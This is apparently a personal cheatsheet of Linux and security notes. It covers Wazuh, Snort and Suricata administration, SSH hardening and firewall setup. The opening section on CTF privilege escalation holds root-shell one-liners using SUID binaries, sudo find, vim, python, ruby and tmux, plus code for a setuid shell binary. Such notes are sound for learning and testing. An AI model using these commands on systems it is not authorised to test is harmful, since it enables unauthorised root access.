Notes

This is where I will write notes about different topics. Note that information included in this “cheatsheet” could have change after it was added to the cheatsheet. I will do my best to keep it updated.

Privilege Escalation

This could be used during CTFs. I have used these commands before when working on a challenge. Check the results with the information stored at gtfo.org.

Finding SUID Executables

find / -perm -u=s -type f 2>/dev/null

Checks for executables with 4000 permissions that could be used to to get root permissions.

• -type f : Will Look for regular files

find / -perm -4000 -type f 2

Listing all files with the SUID permission, check gtfo.org to see if any executables can be used to obtain root.

find / -type f -perm -4000 -exec ls -l {} \; 2>/dev/null

Another way of finding possible binaries that could be used to get root. Each line is a different command that can be used to find binaries that could be used to get root.

sudo find . -exec /bin/sh \; -quit
find / -perm -4000 -exec ls -l {} \;
find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -4000 -user root -ls 2>/dev/null
find / -type f -perm -u=s -user root -ls 2>/dev/null

Finding SGID Binaries

This is very similar to finding and using SUID binaries to get root on a box.

They too use the find command to find said binaries.

find / -type f -perm -2000 2>/dev/null
find / -type f -perm -g=s 2>/dev/null

find / -type f -perm -2000 -user root -ls 2>/dev/null
find / -type f -perm -g=s -user root -ls 2>/dev/null

Creating Your Own SUID Binary

print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c   
gcc -o /tmp/suid /tmp/suid.c  
sudo chmod +x /tmp/suid # execute right
sudo chmod +s /tmp/suid # setuid bit

Using Tools To Get Shell

Using VIM To Get A Shell

sudo vim -c '!sh'
sudo -u root vim -c '!sh'

Using Tmux To Get A Shell

In the past I used this to be able to read a file that contained the flag that was protected by root. There was a Tmux session running that has root access.

export TMUX=/tmp/tmux-1000/default,1234,0 
tmux ls

Another way of determining if there is a tmux process is running as root is the following command.

 ps aux | grep tmux

First task is to see all the processes running under root using the following command:

ps -u root

The output of the command above will show the following:

/usr/bin/tmux -S /.root/vulnerable_session

Now you should have root if the process is running root. Use the id command to confirm your access.

Using Python To Escalate Privilege

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Using Ruby To Escalate Privilege

First we use the find command to see if there are any Ruby executables that are running as root.

find / -perm -u=s -type f 2>/dev/null | grep ruby

Here is yet another way of attempting to Escalate Privilege.

/usr/bin/ruby -e 'Process::Sys.setuid(0); exec "/bin/bash"' 

Another way of abusing Ruby is to use sudo -l to see if the output looks something like the following:

(root) NOPASSWD: /usr/bin/ruby

If it shows that then this command can be ran.

sudo ruby -e 'exec "/bin/bash"'

Wazuh

File Locations

Files Location Windows

Files Location Linux

Files Location Mac

Downloading Wazuh Password Tool

curl -sO https://packages.wazuh.com/4.14/wazuh-passwords-tool.sh

Windows Manipulating Wazuh Services

Windows Start Wazuh Service

NET START WazuhSvc

Restarting Agent On Windows (powershell)

You might need to open a PowerShell as an Administrator.

Restart-Service -Name wazuh

Check Wazuh Status Windows (powershell)

Get-Service -Name wazuhsvc

Stopping Wazuh Service On Windows

Stop-Service -Name wazuh

Finding Wazuh Services Using Windows Services Manager

First Type services into the search bar in the lower left corner of Windows. Another option to get to the same menu is to press Win + R then type services.msc and press enter.

Now locate any services that have the word wazuh or wazuhSvc.

Now right click the service and select your option.

Agents

Upgrading Manager & Agents

Using the following command will list all the agents that need to be upgraded.

sudo /var/ossec/bin/agent_upgrade -l

Next we have to use the following command to update a certain agent by the ID of the agent.

/var/ossec/bin/agent_upgrade -a 003

In the example above we upgraded the agent with the id 003.

Create An New Agent Group

The command below will create a new agent group with the name of Suricata.

sudo /var/ossec/bin/agent_groups -a -g Suricata -q

List All The Agents

sudo /var/ossec/bin/manage_agents -l

Adding An Agent ID To A Group

This command you must use command to list the agent IDs to get the agent you want to add to a group. You must also use the sudo /var/ossec/bin/agent_groups -a -g <AGENT_ID> -q command to create the new group BEFORE adding an agent to the group.

sudo /var/ossec/bin/agent_groups -a -i <AGENT_ID> -g <Group Name> -q

Checking If Everything Is Up

Uses nc to make a connection to the following ports.

• 1514
• 1515
• 55000

Replace <ip> with the IP of the Wazuh Dashboard.

sudo nc -zv <ip> 1514 1515 55000

If the ports are open on the IP then it will display something like the following:

Connection to <ip> 1514 port [tcp/*] succeeded!
Connection to <ip> 1515 port [tcp/*] succeeded!
Connection to <ip> 55000 port [tcp/*] succeeded!

Upgrading With only-upgrade

Upgrading Dashboard

sudo apt-get install --only-upgrade wazuh-dashboard

Updating Manager

sudo apt-get install --only-upgrade wazuh-manager

Updating Indexer

sudo apt-get install --only-upgrade wazuh-indexer

Linux Manipulating Wazuh Services

Listing Services Related To Wazuh In Linux

This will allow the user to find all the services and then uses grep to only show services related to wazuh.

sudo systemctl list-units --type=service --all | grep wazuh

Restarting Wazuh-Manager service

systemctl restart wazuh-manager

Restarting wazuh-agent service

sudo systemctl restart wazuh-agent

Install Wazuh-agent and Setting WAZUH_MANAGER

You must change 10.0.0.2 to the IP of the Wazuh Manager. The agent will connect to that IP.

WAZUH_MANAGER="10.0.0.2" apt-get install wazuh-agent

Example of Adding Log Support

This shows how you can add log support. In this example we are adding the Suricata logs.

<localfile>
    <log_format>json</log_format>
    <location>/var/log/suricata/eve.json</location>
</localfile>

Bash Script To Start Wazuh Services

This can be used on Linux based systems to start up the Wazuh services.

function check_ssh () {
        echo "Starting up SSH...."
        # check to see if the SSH service is active...
        check_status="$(systemctl is-active ssh)"
        if [ "$check_status" = "active" ]; then
                echo -e "\e[1;32mSSH is active... Exiting.... \n\n\e[0m\n"
        else
                echo -e "\e[31SSH is not running... Starting now... \n\n\n\e[0m"
                # the SSH service is not active so we start it
                starting_ssh="$(sudo service ssh start)"
                echo -e "$starting_ssh \n\n\n\n"
        fi
}

function wazuh () {
        # create a array with the three names for wazuh.
        wazuh_services_name=("wazuh-dashboard.service" "wazuh-indexer.service" "wazuh-manager.service")
        for i in "${wazuh_services_name[@]}"
        do
                # check to see if the services in the array are active or inactive
                check_status="$(systemctl is-active $i)"
                if [ "$check_status" = "inactive" ]; then
                        echo -e "\e[31m$i is $check_status \n\n\n\e[0m\n"
                        echo -e "Starting $i... \n\n\n"
                        # remove .service from the service name so we can start the service again
                        service_name="${i%.*}"
                        # starts the service that was detected as being inactive
                        starting_service="$(sudo service $service_name start)"
                        echo "$starting_service"
                else
                        # the service is active
                        echo -e "\e[1;32m$i is $check_status \n\n\n\e[0m\n"
                fi
        done
}


check_ssh

wazuh

Uninstall Wazuh Bash Script

This bash script will remove all traces of Wazuh. This could be used if you do something that breaks it. You can remove all traces and then start out fresh.

sudo apt-get remove --purge wazuh-dashboard
sudo rm -rf /usr/share/wazuh-dashboard /etc/wazuh-dashboard /var/lib/wazuh-dashboard
sudo rm -rf /var/lib/dpkg/info/wazuh-*
sudo rm -rf /var/log/wazuh-dashboard
sudo deluser wazuh-dashboard
sudo delgroup wazuh-dashboard
apt-get update

echo "[=================================PURGE wazuh-manager========================================]"

apt-get remove --purge wazuh-manager -y
rm -rf /var/ossec/

echo "[====================================PURGE filebeat==========================================]"

apt-get remove --purge filebeat -y
rm -rf /var/lib/filebeat/
rm -rf /usr/share/filebeat/
rm -rf /etc/filebeat/

echo "[===================================PURGE wazuh-index========================================]"

apt-get remove --purge wazuh-indexer -y
rm -rf /var/lib/wazuh-indexer/
rm -rf /usr/share/wazuh-indexer/
rm -rf /etc/wazuh-indexer/

echo "[=====================================UPDATE=================================================]"
apt-get update

Issues And Solutions

API id [default]: 3099 – ERROR3099 – Invalid credentials

To fix this issue, look at the file of /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml.

If the password has a randomly generated password, change it to wazuh-wui

The username should be the same.

ERROR: (4112): Invalid server address found: ‘MANAGER_IP’

Edit the /var/ossec/etc/ossec.conf file and replace MANAGER_IP with the IP of the manager.

<server>
   <address>MANAGER_IP</address>
   <port>1514</port>
   <protocol>tcp</protocol>
</server>

After making the change we have to restart the wazuh-agent service using the command below.

start wazuh-agent.service

Resetting Wazuh password

• cannot use !
• The password must have a length between 8 and 64 characters and contain at least one upper and lower case letter, a number and a symbol(.*+?-)

sudo ./wazuh-passwords-tool.sh -u admin -p <password>

Searching for Suricata Groups

This can be in Wazuh’s search feature to sort by a group, in this case a group named suricata.

rule.groups:suricata

Snort

Snort is a open source IDS/IPS. It has a bunch of useful features. Such as:

Installing Snort Using APT

The commands below will first update and upgrade the machine. After updating and upgrading the system it will use apt to install snort. The -y argument will run it without user input.

sudo apt update && sudo apt upgrade -y
sudo apt install snort -y

File Locations

Linux

Windows

Mac

Adding Snort To Wazuh’s Configuration

To connect Snort’s logs to the Wazuh Manager you will need to add the following text to the /var/ossec/etc/ossec.conf file.

<localfile>
  <log_format>snort-full</log_format>
  <location>/var/log/snort/snort.alert.fast</location>
</localfile>

The <location> tag can be changed to a different location or file that contains the Snort file.

Commands

Running Snort With eth0 interface

The -c argument is followed by the location of the snort.conf file. The -i argument tells snort to listen to the eth0 interface.

snort -c /etc/snort/snort.conf -i eth0

Display The Alerts On The Console

• The -c argument gives the config file that will be used to match.
• The -A stands for Alert-Mode and will need to be followed by the word console.

sudo snort -c /etc/snort/snort.conf -A console

Logging Traffic Into PCAP File

• The -b argument will Log packets in a tcpdump formatted file.

• The -L argument will take the given name and create a binary log file.

snort -b -L packets.pcap

Running Snort In Daemon mode

The -D arguments will run in the daemon mode which will send Alerts to /var/log/snort/alert but this can be changed easily by giving it a new value. This will allow you to run Snort in the background. This means you could exit the terminal.

sudo snort -c /etc/snort/snort.conf -D

Reading Generated Logs

The -r argument will read the given log file.

sudo snort -r <log file>

Config File Tester

snort -T -c /usr/local/etc/snort/snort.conf

Suricata

Files Location

Installing Suricata Using APT

This will be used to install Suricata on a system.

sudo add-apt-repository ppa:oisf/suricata-stable
sudo apt-get update
sudo apt-get install suricata -y

Download rules from emergingthreats.net

cd /tmp/ && curl -LO https://rules.emergingthreats.net/open/suricata-6.0.8/emerging.rules.tar.gz

Suricata’s Commands

More commands or arguments can be found here.

Updating Suricata

This will download the Emerging Threats Open ruleset. The rules will be downloaded to the /var/lib/suricata/rules/ directory.

It will also update the rules, this means if rules were added it will add the new rules to the current rules. This command should be ran frequently.

sudo suricata-update

Running Suricate With Config & Rules

sudo suricata -c /etc/suricata/suricata.yaml -i eth0 -s /etc/suricata/rules/local.rules

Test Configure File

suricata -T -c /etc/suricata/suricata.yaml

Restart Suricata Service

sudo systemctl restart suricata

Live View Of Fast Logs Using Tails

tail -f /var/log/suricata/fast.log

Aliases & Bashrc

Used in the .bashrc file. Don’t forget to use source .bashrc after editing the file.

Git Aliases

alias gs='git status'
alias ga='git add'
alias gc='git commit -m'
alias gp='git pull'

CD-ing Into Suricata Folder

alias rules='cd /var/lib/suricata/rules'

Disabling Ruby’s Debug

export RUBYOPT='-W0'

CD-ing Into Suricata Logs

alias slog='cd /var/log/suricata'

Windows Open Connections

Netstat

netstat -abno

Linux Open Connections

Netstat – Getting Open Ports

netstat -lntu

SS Command – Get Open Connections

ss -lntua

Lsof Command – Find listening ports

sudo lsof -i -P -n | grep LISTEN

SSH

Using systemctl to see if SSH Service is Active

This will not show anything. To have it print the word active then you should remove the --quiet argument.

systemctl is-active --quiet ssh

Creating SSH Keys

Password authentication for SSH is not secure. There are threat actors scanning the internet brute forcing all and any servers with SSH open to the public. But you can prevent your server being hacked by using SSH keys. You should set it up so that you need BOTH the password and the correct key to access the server.

How SSH works is that your private key is stored on your local host or your host machine. The public key is stored on your server or remote machine.

First run the following command to generate a key. You will need to move your mouse randomly to generate a more random entropy.

This should be done on your host computer not the server. The ssh-copy-id will add your public key to the remote server.

ssh-keygen

By default running the command above will create a new directory and file:

/home/your_username/.ssh/id_rsa

Next you have to copy your public key to the server where you want to connect to.

ssh-copy-id username@remote_host

If you do not have the ssh-copy-id program you can use the following command.

cat ~/.ssh/id_rsa.pub | ssh username@remote_host "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"

Enabling Key Authentication with SSHD

This is were you edit the file on the remote server.

Now you have to use your favorite text editor to edit the following file.

/etc/ssh/sshd_config

Now that you have the SSHD config file open you should uncomment ( remove the # ) from the following lines:

PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys

Now that you have changed the SSH config file for the change to take effect.

Changing The Port To A Non Standard Port

The standard port for SSH is usually TCP port 22. This guide will set up SSH for a port in which is not port 22.

This guide is assuming you are using SSHD. First you have to use your favorite text editor to edit the following file.

/etc/ssh/sshd_config

Next find the line in the config file that has #port22.

Next you have to remove the comment ( # ) from the line. Next change the number from 22 to the number you want the SSH service to be on. Now save and exit your text editor.

The last step is you need to use the following command to restart the SSHD service.

sudo service sshd restart

Another option is to run the following command which will also restart the SSH service.

sudo systemctl restart ssh
sudo systemctl restart sshd

Opening Ports On Linux

First you have to enable ufw before you open the port. The command below can be used to do just that.

sudo ufw enable

Open By Service

sudo ufw allow ssh

Open By Protocol & Port

sudo ufw allow 22/tcp

Open By Port

sudo ufw allow 22

Checking The Status Of Ports

sudo ufw status

Allow SSH Connections From IP Range

This will add extra security to your system, meaning that only people in the given subnet will be able to access port 22. The 192.168.0.0/24 could be changed to a public or private IP or IP range.

sudo ufw allow from 192.168.0.0/24 to any port 22

Troubleshooting SSH

This part of the cheatsheet has tips, tricks and ways for basic troubleshooting A SSH problem.

Common Problems With Permissions

These are some common errors that could occur or problems I have faced before. Your .ssh folder on your host machine will need to have the correct permissions or it will not allow you to SSH into your server.

When using ssh-keygen it should create a hidden folder named .ssh in your home directory. But if it does not for whatever reason, use the mkdir folder to create the folder and set it the correct permissions with the command below.

 mkdir -m 700 .ssh
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys

When you run the ssh-keygen it will generate these files but if for whatever reason that you have issues or it did not create the files.

It will create a file named authorized_key where it stores the public key.

chmod 600 authorized_keys
chown -R username:username authorized_keys

We used the chmod command to make sure the file has the correct permissions. Next it will use the chown -R command to make sure it is accessible to the user. Change the username with your username.

Connection Timed Out

First make sure than the SSH server is pingable. Next make sure you opened the port on the SSH server’s firewall. The most common port used for SSH is port 22. But any other port could be used.

Using ufw you can make sure that the port is opened. First you have to enable ufw using the following command:

sudo ufw enable

Now that the firewall is enable you can use the following command to allow access on the TCP port of 22. This number can be changed if you are using a non standard port.

sudo ufw allow 22/tcp